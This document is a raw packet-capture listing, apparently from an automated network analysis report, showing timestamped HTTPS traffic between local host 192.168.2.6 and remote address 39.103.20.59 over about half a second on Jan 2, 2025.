                                                  Jan 2, 2025 12:14:13.483331919 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.483338118 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.483342886 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.483366966 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.483375072 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.483395100 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.483398914 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.483418941 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.483437061 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.483474016 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.483525038 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.485037088 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.485091925 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.486886978 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.486943007 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.488754988 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.488814116 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.492666006 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.492719889 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.494353056 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.494406939 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.498064995 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.498131037 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.499958992 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.500025988 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.503575087 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.503645897 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.505470991 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.505528927 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.565099955 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.565172911 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.565202951 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.565247059 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.565263987 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.565274000 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.565284967 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.565287113 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.565316916 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.565321922 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.565344095 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.565366030 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.565367937 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.565376043 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.565421104 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.565468073 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.565511942 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.565548897 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.565567017 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.565571070 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.565597057 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.565608978 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.565632105 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.565634966 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.565658092 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.565680027 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.565721989 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.565773964 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.565867901 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.565917015 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.566157103 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.566196918 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.566200972 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.566225052 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.566257954 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.566268921 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.566273928 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.566277981 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.566313028 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.566324949 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.566333055 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.566337109 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.566361904 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.566366911 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.566390991 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.566394091 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.566415071 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.566437960 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.566586018 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.566622019 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.566632986 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.566637039 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.566663980 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.566673994 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.566709042 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.566761971 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.566899061 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.566930056 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.566947937 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.566952944 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.566968918 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.566998005 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.662620068 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.662873030 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.663343906 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.663405895 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.665195942 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.665265083 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.669074059 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.669135094 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.670800924 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.670857906 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.674518108 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.674598932 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.676348925 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.676412106 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.678242922 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.678298950 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.682065010 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.682126999 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.683818102 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.683876038 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.687709093 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.687772036 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.689508915 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.689568996 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.691236019 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.691293955 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.694998980 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.695071936 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.696731091 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.696795940 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.700267076 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.700330019 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.702183008 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.702236891 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.705795050 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.705868959 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.707603931 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.707667112 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.709333897 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.709393024 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.712928057 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.712990999 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.714716911 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.714775085 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.718388081 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.718425035 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.718452930 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.718482971 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.718501091 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.719257116 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.719305992 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.719322920 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.719367027 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.722798109 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.722861052 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.724551916 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.724606991 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.728058100 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.728115082 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.729784012 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.729837894 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.731493950 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.731549025 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.734961033 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.735025883 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.736774921 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.736833096 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.749229908 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.749295950 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.749315023 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.749356031 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.749375105 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.749754906 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.751966000 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.752012968 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.752033949 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.752039909 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.752055883 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.752082109 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.757571936 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.757616997 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.757643938 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.757651091 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.757679939 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.757699013 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.763129950 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.763176918 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.763204098 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.763210058 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.763222933 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.763248920 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.766896963 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.766948938 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.767039061 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.767112017 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.772478104 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.772535086 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.772535086 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.772546053 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.772583008 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.777980089 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.778062105 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.778121948 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.778175116 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.783480883 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.783520937 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.783545971 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.783560038 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.783575058 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.783597946 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.788976908 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.789051056 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.789122105 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.789170027 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.792455912 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.792498112 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.792517900 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.792534113 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.792546034 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.792574883 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.797835112 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.797924995 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.797951937 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.798008919 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.803208113 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.803257942 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.803293943 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.803301096 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.803317070 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.803347111 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.806034088 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.806096077 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.806169033 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.806215048 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.811225891 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.811286926 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.811376095 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.811431885 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.814758062 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.814809084 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.815481901 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.815526009 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.820053101 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.820143938 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.848432064 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.848520994 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.885677099 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.885785103 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.888442039 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.888509035 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.889874935 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.889941931 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.892899036 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.892951965 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.895132065 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.895191908 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.896884918 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.896938086 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.900104046 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.900154114 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.902048111 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.902108908 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.904879093 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.904937983 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.907257080 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.907347918 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.909919024 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.909985065 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.911531925 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.911597967 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.913717985 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.913774967 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.916441917 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.916507959 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.918796062 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.918859005 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.921408892 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.921477079 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.923533916 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.923602104 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.925275087 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.925345898 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.927705050 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.927763939 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.929943085 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.929990053 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.932626963 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.932686090 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.934648037 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.934715033 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.936419964 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.936480999 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.937614918 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.937678099 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.939666986 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.939721107 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.940994024 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.941051006 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.943233967 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.943306923 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.945779085 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.945837975 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.947170019 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.947227001 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.949238062 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.949297905 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.951678038 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.951730013 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.953690052 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.953743935 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.972173929 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.972259045 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.975078106 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.975116968 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.975131035 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.975142002 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.975156069 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.975178957 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.979950905 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.979988098 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.980005980 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.980016947 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.980035067 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.980052948 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.989305019 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.989353895 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.989375114 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.989381075 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.989408970 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.989427090 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.990462065 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.990520954 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.990552902 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.990557909 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.990582943 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.990597010 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.993901014 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.993938923 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.993956089 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.993961096 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.993993044 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.994008064 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.998842955 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.998878002 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.998900890 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.998905897 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.998933077 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.999001026 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.003220081 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.003279924 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.003387928 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.003449917 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.008115053 CET4434998439.103.20.59192.168.2.6
